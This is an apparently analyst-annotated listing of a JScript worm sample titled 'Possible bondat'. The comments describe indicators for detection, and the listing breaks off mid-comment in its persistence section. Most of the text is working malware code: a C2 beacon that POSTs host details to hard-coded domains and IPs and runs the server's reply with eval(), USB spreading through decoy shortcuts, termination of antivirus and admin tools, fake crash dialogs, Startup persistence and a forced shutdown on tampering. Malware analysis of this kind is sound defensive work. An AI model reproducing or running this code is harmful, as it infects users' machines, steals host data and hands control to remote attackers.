James_inthe_box

Possible bondat

Jul 17th, 2019
// Analyst annotation of a Windows Script Host (JScript) worm sample; the paste
// is titled "Possible bondat" by its uploader. The whole program is a single
// IIFE that runs under wscript.exe with COM access (WScript.Shell,
// Scripting.FileSystemObject, Shell.Application, WMI, MSXML2.ServerXMLHTTP,
// ADODB.Stream). Almost every operation is wrapped in a try/catch that
// discards the error, so failures are silent. The recurring
// `{ var e; try { … } catch (_e) { e = _e; { } } }` wrappers look like the
// output of a deobfuscation/pretty-printing pass rather than hand-written code.
//
// Observable artefacts visible in this listing (useful for detection):
//   - registry writes to HKCU\…\Explorer\Advanced\Hidden and \ShowSuperHidden
//   - `cacls "<path>" /T /E /G Users:F /C` on every dropped file/folder
//   - Start.lnk in the all-users and per-user Startup folders, pointing at a
//     renamed copy of wscript.exe in <profile>\AppData\Roaming\<derived name>\
//   - `shutdown /p /f` as a tamper response
//   - removable drives rewritten with a hidden Files\ folder, Files.bat and a
//     .lnk decoy per original file/folder
//   - WMI Win32_Process enumeration with Terminate() on admin/AV tools and a
//     fake "Common Language Runtime Debugging Services" dialog
//   - HTTP GET to microsoft/google/bing (clock/connectivity check) and POST to
//     the four hard-coded C2 URLs with a Chrome/63 User-Agent and a PHPSESSID
//     cookie carrying the RC4 key of the body
// Comments describe what the visible code does; statements about the remote
// side or Windows semantics not demonstrated here are marked as inferred.
(function () {
  // Static beacon parameters, sent as v=, a=, t= in the POST body built by `$`.
  var _ = {
    v: '525',
    a: '',
    t: '0'
  };
  // a   - WScript.Shell (run commands, registry, shortcuts, popups)
  // b   - Scripting.FileSystemObject
  // h   - four random hex digits; no call to h() appears in this listing (cob()
  //       below is the same generator and is the one used; `h` is also
  //       reassigned by `var h = b.getFolder(...)` in the install block)
  // d   - process-environment accessor; f = %USERNAME%, g = %COMPUTERNAME%
  // ru  - Shell.Application (ShellExecute with a hidden window)
  // lo  - paths that sha() keeps open for append (startup shortcuts, script)
  // fup - the open TextStream handles for those paths, keyed by path
  // dod/dot - cached C2 URL and the time it was resolved (see dof)
  var a = new ActiveXObject('wscript.shell'), b = new ActiveXObject('scripting.filesystemobject'), h = function () {
    return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1);
  }, d = a.environment('process'), f = d('username'), g = d('computername'), ru = new ActiveXObject('shell.application'), lo = [], fup = [], dod = '', dot = 0, hf = function (e) {
    // hf: set the Hidden attribute (value 2) on folder `e`; errors ignored.
    {
      var n;
      try {
        var t = b.getFolder(e);
        t.attributes = 2;
      } catch (_n) {
        n = _n;
        {
        }
      }
    }
  }, sc = function (e) {
    // sc: 32-bit string hash (t = t * 31 + charCode, truncated by `t &= t`),
    // returned as a non-negative number. Seeds every derived name below.
    e += '';
    var t = 0;
    for (var n = 0; n < e.length; n++)
      t = (t << 5) - t + e.charCodeAt(n), t &= t;
    return Math.abs(t);
  }, ha = function (e) {
    // ha: deterministic lowercase name (letters a-y, 5 to 9 chars) derived from
    // seed `e`. Always called as ha(g + 'NN'): every artefact name is a
    // function of the computer name plus a two-digit role index, so names are
    // stable on one host but differ between hosts (defeats fixed-name IoCs).
    var t = '', n = sc(e);
    for (var r = 0; r < sc(e) % 5 + 5; r++)
      n = sc(t + n), t += String.fromCharCode(n % 25 + 97);
    return t;
  };
  // zzo: connectivity and clock check. GETs three well-known sites, parses the
  // HTTP Date response header to epoch seconds and returns it when it is later
  // than 1388534400 (2014-01-01 00:00 UTC); otherwise returns false. The main
  // loop only beacons while this succeeds.
  var zzo = function () {
    var ttw = [
      'http://www.microsoft.com/',
      'http://www.google.com/',
      'http://www.bing.com/'
    ];
    for (var i = 0, h, wep; i < ttw.length; i++) {
      {
        var e;
        try {
          var h = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
          h.open('GET', ttw[i]);
          // Hard-coded Chrome 63 User-Agent; `$` reuses the same string.
          h.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
          h.setRequestHeader('Cache-Control', 'no-cache');
          h.setRequestHeader('Pragma', 'no-cache');
          h.setRequestHeader('Connection', 'close');
          h.send('');
          wep = new Date(h.getAllResponseHeaders().split('Date: ').pop().split('\n').shift()).getTime() / 1000;
          if (1388534400 < wep) {
            return wep;
          }
        } catch (_e) {
          e = _e;
          {
          }
        }
      }
    }
    return false;
  };
  // ent: grant the Users group Full Control on `efn` (recursively, /T) via
  // cacls, run hidden (window style 0) and synchronously. Applied to every
  // dropped file and folder so any local account can read and replace them.
  var ent = function (efn) {
    {
      var e;
      try {
        a.run('%comspec% /c cacls "' + efn + '" /T /E /G Users:F /C', 0, true);
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
  }, hr = function (e) {
    // hr: toggle Explorer's hidden-file display under HKCU.
    // Truthy e -> Hidden=1, ShowSuperHidden=1 (show hidden/system files);
    // falsy e -> Hidden=2, ShowSuperHidden=0 (hide them). The sample calls
    // hr(0) after installing, which conceals its attribute-hidden folders.
    if (e)
      var t = 1, n = 1;
    else
      var t = 2, n = 0;
    {
      var r;
      try {
        a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden', t, 'REG_DWORD');
      } catch (_r) {
        r = _r;
        {
        }
      }
    }
    {
      var r;
      try {
        a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden', n, 'REG_DWORD');
      } catch (_r) {
        r = _r;
        {
        }
      }
    }
  };
  // rc: RC4. First loop fills S, second is the key-scheduling swap, third is
  // the keystream generator XORed into `str` one char code at a time. `$`
  // uses it with a fresh random key per request; that key is sent in clear in
  // the PHPSESSID cookie of the same request, so this is obfuscation of the
  // beacon body rather than confidentiality.
  var rc = function (key, str) {
    var s = [], j = 0, x, res = '';
    for (var i = 0; i < 256; i++) {
      s[i] = i;
    }
    for (i = 0; i < 256; i++) {
      j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
      x = s[i];
      s[i] = s[j];
      s[j] = x;
    }
    i = 0;
    j = 0;
    for (var y = 0; y < str.length; y++) {
      i = (i + 1) % 256;
      j = (j + s[i]) % 256;
      x = s[i];
      s[i] = s[j];
      s[j] = x;
      res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return res;
  };
  // cob: four random hex digits; concatenated below into the bot id `tff`
  // in an 8-4-4-4-12 GUID-like layout.
  var cob = function () {
    return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
  };
  // kk: "not yet installed" flag; cleared once an install folder was found and
  // the startup entries were written.
  var kk = 1;
  // zbo: process-name substrings the watchdog child (argument ha(g + '12'))
  // terminates: regedit, Windows update packages, MRT, System Restore,
  // msconfig, Sysinternals tools (procexp, autoruns, procmon, regmon, tcpview),
  // AV / anti-malware products and removal utilities, Wireshark, Fiddler,
  // resmon/perfmon. Matching is a case-insensitive alternation of the list.
  var zbo = [
    'regedit',
    'windows-kb',
    'mrt',
    'rstrui',
    'msconfig',
    'procexp',
    'avast',
    'avg',
    'mse',
    'ptinstall',
    'sdasetup',
    'issetup',
    'fs20',
    'mbam',
    'housecall',
    'hijackthis',
    'rubotted',
    'autoruns',
    'avenger',
    'filemon',
    'gmer',
    'hotfix',
    'klwk',
    'mbsa',
    'procmon',
    'regmon',
    'sysclean',
    'tcpview',
    'unlocker',
    'wireshark',
    'fiddler',
    'resmon',
    'perfmon',
    'msss',
    'cleaner',
    'otl',
    'roguekiller',
    'fss',
    'zoek',
    'emergencykit',
    'dds',
    'ccsetup',
    'vbsvbe',
    'combofix',
    'frst',
    'mcshield',
    'zphdiag'
  ];
  // eth: hex-encode `str`, randomly inserting one letter from alphabet `x`
  // before and/or after each byte. `x` contains no hex digit (a-f / A-F), so
  // the receiver can presumably recover the hex by dropping non-hex characters
  // (inferred; the server side is not visible here).
  var eth = function (str) {
    var r = [];
    var rr = '';
    var e = str.length;
    var c = 0;
    var h;
    var x = 'HsrPWXkyVtmGUTRzuqLiIZlJhjpQnvNwMogYKOSx'.split('');
    while (c < e) {
      h = str.charCodeAt(c++).toString(16);
      while (h.length < 2)
        h = '0' + h;
      r.push(h);
    }
    for (var i = 0; i < r.length; i++) {
      if (Math.round(Math.random() * 1))
        rr += pw(x);
      rr += r[i];
      if (Math.round(Math.random() * 1))
        rr += pw(x);
    }
    return rr;
  };
  // shh: in-place random shuffle of array `o` (swap each index with a random
  // lower one); returns the same array. Used to randomise the C2 URL order.
  var shh = function (o) {
    for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
    return o;
  };
  // kp: kill switch - exit when ofb + ha(g + '09') exists (`ofb` is the install
  // folder chosen below). The primary instance deletes that file after taking
  // its lock, so this effectively only stops the watchdog children.
  var kp = function () {
    if (b.fileExists(ofb + ha(g + '09')))
      WScript.quit();
  };
  // zt: tamper response. ha(g + '00') is the lock file the primary instance
  // keeps open as `Oq`. If a child can open it for append, the primary is
  // presumably no longer running, and the child forces an immediate power-off
  // (`shutdown /p /f`). This relies on FSO append opens being exclusive, which
  // is not demonstrated in this listing.
  var zt = function () {
    {
      var e;
      try {
        var t = b.openTextFile(ofb + ha(g + '00'), 8, !0);
        t.close();
        a.run('%comspec% /c shutdown /p /f', 0);
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
  };
  // fuu: full paths of every *.exe in the install folder `ofb` - the renamed
  // wscript.exe copies created in the install block.
  var fuu = function () {
    var ttt = [];
    for (var i = new Enumerator(b.getFolder(ofb).Files); !i.atEnd(); i.moveNext()) {
      if (b.getExtensionName(i.item().Name) == 'exe')
        ttt.push(ofb + i.item().Name);
    }
    return ttt;
  };
  // sha: `too` truthy -> open every path in `lo` for append (creating it if
  // missing) and keep the handle in `fup`, apparently to keep the startup
  // shortcuts and script copy locked against deletion while the process lives;
  // falsy -> close those handles.
  var sha = function (too) {
    for (var i = 0; i < lo.length; i++) {
      if (too) {
        {
          var e;
          try {
            fup[lo[i]] = b.openTextFile(lo[i], 8, !0);
          } catch (_e) {
            e = _e;
            {
            }
          }
        }
      } else {
        {
          var e;
          try {
            fup[lo[i]].close();
          } catch (_e) {
            e = _e;
            {
            }
          }
        }
      }
    }
  };
  // dof: resolve the C2 URL. A previous answer is reused for six hours
  // (dot + 6h >= now). Otherwise the four hard-coded candidates (two domains,
  // two raw IPs - all IoCs from this sample) are shuffled and probed with
  // $('asl', url). Success is detected indirectly: the probe eval()s the
  // response and reading `zxcvb` only works if that response defined it;
  // otherwise the ReferenceError lands in the catch. Returns the working URL
  // or false.
  var dof = function () {
    if (dod != '' && dot + 60 * 60 * 6 * 1000 >= new Date().getTime()) {
      return dod;
    } else {
      var doh = shh([
        'http://www.nycnote.in/',
        'http://95.153.31.22/',
        'http://95.153.31.18/',
        'http://www.nycnote.pw/'
      ]);
      var dec = '';
      for (var doi = 0; doi < doh.length; doi++) {
        {
          var e;
          try {
            $('asl', doh[doi]);
            var hgf = zxcvb;
            dec = doh[doi];
          } catch (_e) {
            e = _e;
            {
            }
          } finally {
            delete zxcvb;
            delete hgf;
          }
        }
        if (dec != '')
          break;
      }
      if (dec == '') {
        return false;
      } else {
        dod = dec;
        dot = new Date().getTime();
        return dod;
      }
    }
  };
  // $: beacon / tasking. Report string:
  //   fab + ';v=<_.v>&a=<_.a>&t=<_.t>&u=<user>&c=<computer>&p=<ProductID>
  //       &i=<bot id tff>&e=<OS language>&b=<OS version>&s=<su>'
  // It is RC4-encrypted under a fresh 26-char alphanumeric key `s`, hex+noise
  // encoded by eth(), and POSTed as a urlencoded body; `s` travels in the
  // PHPSESSID cookie of the same request. fat === 1 means "use dof()", any
  // other value is the URL itself (dof() calls back in with fat = url).
  // The response body is saved to ofb + ha(g + '06') via ADODB.Stream, read
  // back and deleted; the text between '<!-- ' and ' -->' is decoded (first
  // five chars minus 32 form a key, each remaining char is shifted down by
  // key[i % 5], values < 32 wrap via 95 + c) and handed to eval() through
  // `rewrite`. `rewrite` is not defined anywhere in this listing, so in this
  // copy that call throws ReferenceError and is swallowed - likely a capture /
  // deobfuscation artefact or a name supplied by an outer loader. Either way,
  // the decoded server response is executed as JScript when it works.
  var $ = function (fab, fat) {
    var m = ofb + ha(g + '06');
    var q = [
      'a',
      'b',
      'c',
      'd',
      'e',
      'f',
      'g',
      'h',
      'i',
      'j',
      'k',
      'l',
      'm',
      'n',
      'o',
      'p',
      'q',
      'r',
      's',
      't',
      'u',
      'v',
      'w',
      'x',
      'y',
      'z',
      '0',
      '1',
      '2',
      '3',
      '4',
      '5',
      '6',
      '7',
      '8',
      '9'
    ];
    var s = '';
    for (var r = 0; r < 26; r++)
      s += q[Math.round(Math.random() * 35)];
    var v = eth(rc(s, fab + ';v=' + _.v + '&a=' + _.a + '&t=' + _.t + '&u=' + escape(f) + '&c=' + escape(g) + '&p=' + escape(w) + '&i=' + escape(tff) + '&e=' + escape(ll.join('-')) + '&b=' + escape(vn.join('.')) + '&s=' + escape(su)));
    var yun = fat === 1 ? dof() : fat;
    if (yun == false)
      throw Error();
    var j = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
    j.open('POST', yun);
    j.setRequestHeader('Cache-Control', 'no-cache');
    j.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    j.setRequestHeader('Content-Length', v.length);
    // The RC4 key is exposed here; a proxy log of the cookie decrypts the body.
    j.setRequestHeader('Cookie', 'PHPSESSID=' + s);
    j.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
    j.setRequestHeader('Pragma', 'no-cache');
    j.setRequestHeader('Connection', 'close');
    j.send(v);
    var c = new ActiveXObject('ADODB.Stream');
    c.mode = 3;
    c.type = 1;
    c.open();
    c.write(j.responseBody);
    c.saveToFile(m, 2);
    var k = b.openTextFile(m, 1);
    var l = k.readAll();
    k.close();
    {
      var e;
      try {
        b.deleteFile(m);
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
    // `c` is redeclared here and reused as the decoded char code.
    var c, out = '', key = [];
    l = l.split('<!-- ').pop().split(' -->').shift().split('');
    for (var i = 0; i < 5; i++)
      key.push(l.shift().charCodeAt(0) - 32);
    for (var i = 0; i < l.length; i++) {
      c = l[i].charCodeAt(0) - key[i % key.length];
      out += String.fromCharCode(c < 32 ? 95 + c : c);
    }
    {
      var e;
      try {
        eval(rewrite(out, true));
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
  };
  // sk: (re)spawn the two watchdog children. For each role - ha(g + '10') USB
  // spreader, ha(g + '12') process killer - the lock file ha(g + '11') /
  // ha(g + '13') is opened for append and closed again. If that open throws,
  // the child is presumably alive and holding it (the child opens it and never
  // closes it) and nothing happens. On success the ACL is loosened, the locked
  // startup files are released once (sha(0)), and this script is re-executed
  // hidden via a random renamed wscript.exe copy (pw(w0)) with the role name as
  // the only argument. After 1.5 s the startup files are re-locked.
  var sk = function () {
    var foc = 0;
    {
      var e;
      try {
        var cbo = ofb + ha(g + '11');
        var t = b.openTextFile(cbo, 8, !0);
        t.close();
        ent(cbo);
        if (!foc)
          sha(0);
        foc++;
        ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '10'), '', '', 0);
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
    {
      var e;
      try {
        var cbo = ofb + ha(g + '13');
        var t = b.openTextFile(cbo, 8, !0);
        t.close();
        ent(cbo);
        if (!foc)
          sha(0);
        foc++;
        ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '12'), '', '', 0);
      } catch (_e) {
        e = _e;
        {
        }
      }
    }
    if (foc) {
      WScript.sleep(1500);
      sha(1);
    }
  };
  // pw: random element of array `mp`.
  var pw = function (mp) {
    return mp[Math.floor(Math.random() * mp.length)];
  };
  // ---- host fingerprint ------------------------------------------------------
  // w: Windows ProductID read from HKLM (reported as p=); '000' if unreadable.
  var w = '000';
  {
    var e;
    try {
      w = a.regRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID');
    } catch (_e) {
      e = _e;
      {
      }
    }
  }
  // vn: OS version parts from WMI Win32_OperatingSystem.Version (reported as
  // b=). Fallback: 6 when <systemdrive>\Users exists, else 5. vn[0] >= 6
  // selects the \AppData\Roaming\ layout everywhere below.
  var vn = [
    0,
    0,
    0,
    0
  ];
  {
    var e;
    try {
      for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
        vn = i.item()['version'].split('.');
        if (vn[0] >= 5)
          break;
      }
    } catch (_e) {
      e = _e;
      {
      }
    }
  }
  if (!vn[0])
    vn[0] = b.folderExists(d('systemdrive') + '\\Users') ? 6 : 5;
  // ll: OS UI language as [language, region] (reported as e=): OSLanguage is
  // zero-padded to a 4-digit hex LCID and looked up in the Rfc1766 registry
  // map, whose value is split on ';' and '-'.
  var ll = [
    '',
    ''
  ];
  {
    var e;
    try {
      var osl;
      for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
        osl = (osl = i.item()['OSLanguage'].toString(16)).length == 4 ? osl : new Array(5 - osl.length).join('0') + osl;
        ll = a.regRead('HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\' + osl).split(';')[0].split('-');
        break;
      }
    } catch (_e) {
      e = _e;
      {
      }
    }
  }
  // ---- installation / role dispatch ------------------------------------------
  // Walk every profile under <userprofile>\..\ looking for an existing install
  // folder <profile>\AppData\Roaming\<ha(g+'02')>\ (or <profile>\<ha(g+'02')>\
  // before Vista). w0 collects renamed wscript.exe copies; ofb becomes the
  // install folder. Any exception escaping this block terminates the script.
  {
    var e;
    try {
      var w0 = [];
      var ofb = false;
      var gg = b.getFolder(d('userprofile') + '\\..\\');
      for (var i = new Enumerator(gg.SubFolders); !i.atEnd(); i.moveNext()) {
        var bfo = i.item() + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02') + '\\';
        if (b.folderExists(bfo)) {
          try {
            // ha(g+'05'): touched marker file; hd: bot-id file; bfi: the copy
            // of this script that the startup shortcuts launch.
            var ZE = b.openTextFile(bfo + ha(g + '05'), 8, !0);
            ZE.close();
            var hd = bfo + ha(g + '03'), bfi = bfo + ha(g + '04') + '.js';
            ent(bfo + '*');
            hf(bfo);
            ofb = bfo;
            try {
              b.copyFile(WScript.scriptFullName, bfi, true);
            } catch (e) {
            }
            try {
              // Instance lock: ha(g+'00') is opened for append and held in Oq
              // for the life of the primary instance (see zt). Taking it also
              // removes the kill file ha(g+'09').
              var cvv = ofb + ha(g + '00');
              var Oq = b.openTextFile(cvv, 8, !0);
              ent(cvv);
              try {
                b.deleteFile(ofb + ha(g + '09'));
              } catch (e) {
              }
            } catch (e) {
              // Lock already held: this process is a child spawned by sk().
              // Its role is the first command-line argument.
              if (WScript.Arguments.length > 0) {
                switch (WScript.Arguments(0)) {
                case ha(g + '10'):
                  // USB spreader. Holds lock ha(g+'11') (zbz, never closed)
                  // and exits if it cannot take it.
                  var cbo = ofb + ha(g + '11');
                  try {
                    var zbz = b.openTextFile(cbo, 8, !0);
                  } catch (e) {
                    WScript.quit();
                  }
                  ent(cbo);
                  while (true) {
                    try {
                      // WMI: each disk whose Model contains "usb", then its
                      // partitions, then their logical drives (lD = "X:\").
                      var oot = GetObject('winmgmts:root\\cimv2');
                      for (var dS = new Enumerator(oot.ExecQuery('SELECT * FROM Win32_DiskDrive')); !dS.atEnd(); dS.moveNext()) {
                        if (dS.item().Model.match(/usb/i)) {
                          var did = dS.item().DeviceID;
                          for (var dPS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskDrive.DeviceID=\'' + did + '\'} WHERE AssocClass=Win32_DiskDriveToDiskPartition')); !dPS.atEnd(); dPS.moveNext()) {
                            var pID = dPS.item().DeviceID;
                            for (var lDS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskPartition.DeviceID=\'' + pID + '\'} WHERE AssocClass=Win32_LogicalDiskToPartition')); !lDS.atEnd(); lDS.moveNext()) {
                              // Layout written to the removable drive:
                              //   X:\Files\                 (trd) hidden; receives the real content
                              //   X:\Files\NNN\             (pod) NNN = sc(g) % 500 + 405
                              //   X:\Files\NNN\<ha(g+'01')>.js (pid) copy of this script
                              //   X:\Files.bat              (bat) launcher run by every .lnk
                              var lD = lDS.item().DeviceID + '\\', trr = 'Files\\', trd = lD + trr, poor = sc(g) % 500 + 405 + '\\', por = trr + poor, pod = lD + por, piir = ha(g + '01') + '.js', pir = por + ha(g + '01') + '.js', pid = lD + pir, bat = lD + 'Files.bat';
                              try {
                                // Refresh copies left by earlier infections: any .js in a
                                // three-digit numeric subfolder of Files\ is overwritten
                                // with this script.
                                var gf = b.getFolder(trd);
                                for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
                                  var ff = (fS.item() + '').split('\\').pop();
                                  if (ff.length == 3 && !isNaN(parseFloat(ff)) && isFinite(ff)) {
                                    var fg = b.getFolder(trd + ff);
                                    for (var Sf = new Enumerator(fg.Files); !Sf.atEnd(); Sf.moveNext()) {
                                      var fff = (Sf.item() + '').split('\\').pop();
                                      if (b.getExtensionName(fff).toLowerCase() == 'js') {
                                        try {
                                          b.copyFile(WScript.scriptFullName, trd + ff + '\\' + fff, true);
                                        } catch (e) {
                                        }
                                      }
                                    }
                                  }
                                }
                              } catch (e) {
                              }
                              // A file named 0.gz in the install folder disables the
                              // drive-hijacking step; nothing in this listing creates it.
                              if (b.fileExists(bfo + '0.gz') === false) {
                                try {
                                  b.createFolder(trd);
                                } catch (e) {
                                }
                                try {
                                  b.createFolder(pod);
                                } catch (e) {
                                }
                                hf(trd), hf(pod);
                                try {
                                  // Files.bat: cd into the numbered folder, start the
                                  // script with wscript, exit.
                                  var otff = b.openTextFile(bat, 2, 1);
                                  otff.writeLine('cd Files\\' + poor), otff.writeLine('%homedrive%\\Windows\\System32\\cmd.exe /c start wscript ' + piir), otff.writeLine('exit'), otff.close();
                                } catch (e) {
                                }
                                // shell32.dll icon indexes used for the folder decoys.
                                var bro = [
                                  127,
                                  128,
                                  129
                                ];
                                try {
                                  // Every top-level folder (except names starting with '.' or
                                  // '$', recycle bin, System Volume Information and Files) is
                                  // replaced by a hidden-window cmd.exe .lnk that runs
                                  // Files.bat and then opens the real folder from
                                  // Files\<name> with explorer; the folder itself is moved
                                  // into Files\ and hidden.
                                  var gf = b.getFolder(lD);
                                  for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
                                    var ff = (fS.item() + '').split(':\\').pop();
                                    if (ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null && ff.match(/System Volume/) == null && ff.match(/Files/) == null) {
                                      with (a.createShortcut(lD + ff + '.lnk'))
                                        targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& set xyz=explorer&& %homedrive%\\Windows\\System32\\cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c %xyz% "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + pw(bro), save();
                                      try {
                                        var t = b.getFolder(lD + ff);
                                        t.move(trd + ff);
                                      } catch (e) {
                                      }
                                      hf(trd + ff);
                                    }
                                  }
                                } catch (e) {
                                }
                                try {
                                  // Same treatment for top-level files (skipping .lnk, .bat,
                                  // .js, extensionless files and autorun.inf): the decoy icon
                                  // is chosen by extension (261 exe, 73 documents, 70 text,
                                  // 116 audio, 115 video, 302 images, 0 otherwise), the .lnk
                                  // runs Files.bat and then opens Files\<file>; the original
                                  // is moved into Files\ and hidden.
                                  var gf = b.getFolder(lD);
                                  for (var fS = new Enumerator(gf.Files); !fS.atEnd(); fS.moveNext()) {
                                    var ff = (fS.item() + '').split(':\\').pop();
                                    var exx = b.getExtensionName(ff).toLowerCase();
                                    if (exx != 'lnk' && exx != 'bat' && exx != '' && exx != 'js' && ff.toLowerCase() != 'autorun.inf' && ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null) {
                                      var exo = 0;
                                      switch (exx) {
                                      case 'exe':
                                        exo = 261;
                                        break;
                                      case 'doc':
                                      case 'docx':
                                      case 'pdf':
                                        exo = 73;
                                        break;
                                      case 'rtf':
                                      case 'txt':
                                        exo = 70;
                                        break;
                                      case 'mp3':
                                      case 'm4a':
                                      case 'ogg':
                                      case 'wav':
                                      case 'wma':
                                        exo = 116;
                                        break;
                                      case 'mp4':
                                      case 'avi':
                                      case 'webm':
                                      case 'flv':
                                      case 'mov':
                                      case 'wmv':
                                      case 'mpeg':
                                      case 'mpg':
                                        exo = 115;
                                        break;
                                      case 'gif':
                                      case 'jpg':
                                      case 'jpeg':
                                      case 'png':
                                        exo = 302;
                                        break;
                                      }
                                      with (a.createShortcut(lD + ff + '.lnk'))
                                        targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + exo, save();
                                      try {
                                        b.moveFile(lD + ff, trd + ff);
                                      } catch (e) {
                                      }
                                      hf(trd + ff);
                                    }
                                  }
                                } catch (e) {
                                }
                                // Finally plant the script copy that Files.bat launches.
                                try {
                                  b.copyFile(WScript.scriptFullName, pid, true);
                                } catch (e) {
                                }
                              }
                            }
                          }
                        }
                      }
                    } catch (e) {
                    }
                    // Kill switch, tamper check, then rescan drives every 14 s.
                    kp();
                    zt();
                    WScript.sleep(14000);
                  }
                  break;
                case ha(g + '12'):
                  // Process killer. Holds lock ha(g+'13'); every 400 ms it
                  // enumerates Win32_Process and terminates any whose name matches
                  // a zbo entry. When Terminate() returns 0 and the executable
                  // path does not contain "windows" or "program", a fake
                  // "Common Language Runtime Debugging Services" crash dialog with
                  // random process/thread ids is shown for 8 s (type 1+48+4096:
                  // OK/Cancel buttons, warning icon, system modal).
                  var cbo = ofb + ha(g + '13');
                  try {
                    var zbz = b.openTextFile(cbo, 8, !0);
                  } catch (e) {
                    WScript.quit();
                  }
                  ent(cbo);
                  while (true) {
                    try {
                      var t = GetObject('winmgmts:root\\cimv2');
                      for (var i = new Enumerator(t.ExecQuery('SELECT * FROM Win32_Process')); !i.atEnd(); i.moveNext()) {
                        var it = i.item();
                        if (it['name'].match(new RegExp(zbo.join('|'), 'i'))) {
                          try {
                            if (it.terminate() == 0 && it['ExecutablePath'] && !it['ExecutablePath'].match(/windows|program/i)) {
                              var tp = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
                              var tq = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
                              a.popup('Application has generated an exception that could not be handled.\n\nProcess id=0x' + tp + ' (' + parseInt(tp, 16) + '), Thread id=0x' + tq + ' (' + parseInt(tq, 16) + ').\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.', 8, it['name'] + ' - Common Language Runtime Debugging Services', 1 + 48 + 4096);
                            }
                          } catch (e) {
                          }
                        }
                      }
                    } catch (e) {
                    }
                    kp();
                    zt();
                    WScript.sleep(400);
                  }
                  break;
                }
              }
              // A child with an unhandled or absent argument stops here; only the
              // ha(g+'07') install mode falls through to the setup below.
              if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false)
                WScript.quit();
            }
            // Primary instance: stage a renamed copy of wscript.exe in the install
            // folder (existing *.exe there are deleted first) so the startup
            // shortcuts do not name wscript.exe directly. Name = ha(random)
            // [+ '32' | '64'] + '.exe'. `ww` and `mm` are assigned without `var`,
            // i.e. implicit globals. In ha(g+'07') mode the copies already
            // present are reused instead (fuu()).
            if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false) {
              try {
                a.run('%comspec% /c del /F /S /Q "' + bfo + '*.exe"', 0, true);
                WScript.sleep(500);
              } catch (e) {
              }
              ww = ha(Math.random());
              mm = Math.ceil(Math.random() * 5);
              if (mm > 3)
                ww += mm > 4 ? '64' : '32';
              ww += '.exe';
              b.copyFile(d('systemroot') + '\\system32\\wscript.exe', bfo + ww, true);
              ent(bfo + ww);
              w0.push(bfo + ww);
            } else {
              w0 = fuu();
            }
            var fet = w0[0];
            // su counts successful all-users startup entries (reported as s=).
            var su = 0;
            try {
              // Persistence 1: all-users Startup folder. Start.lnk ->
              // "<renamed wscript>" "<script copy>", normal window, shell32 icon 3.
              // The three older shortcut names are deleted - presumably left by
              // earlier variants (two of them are Spanish: "empezar", "atajo").
              var pp = d('systemdrive') + '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
              var p = pp + 'Start.lnk';
              with (a.createShortcut(p))
                targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
              ent(p);
              su++;
              lo.push(p);
              var cbb = [
                'Windows Explorer.lnk',
                'empezar.lnk',
                'atajo.lnk'
              ];
              for (var i1 = 0; i1 < cbb.length; i1++) {
                try {
                  b.deleteFile(pp + cbb[i1]);
                } catch (e) {
                }
              }
            } catch (e) {
            }
            try {
              // Persistence 2: the same Start.lnk in every profile's own Startup
              // folder. The inner loop bound is the username length (f.length),
              // so the same idempotent work is repeated that many times - this
              // looks like an obfuscation artefact rather than intent.
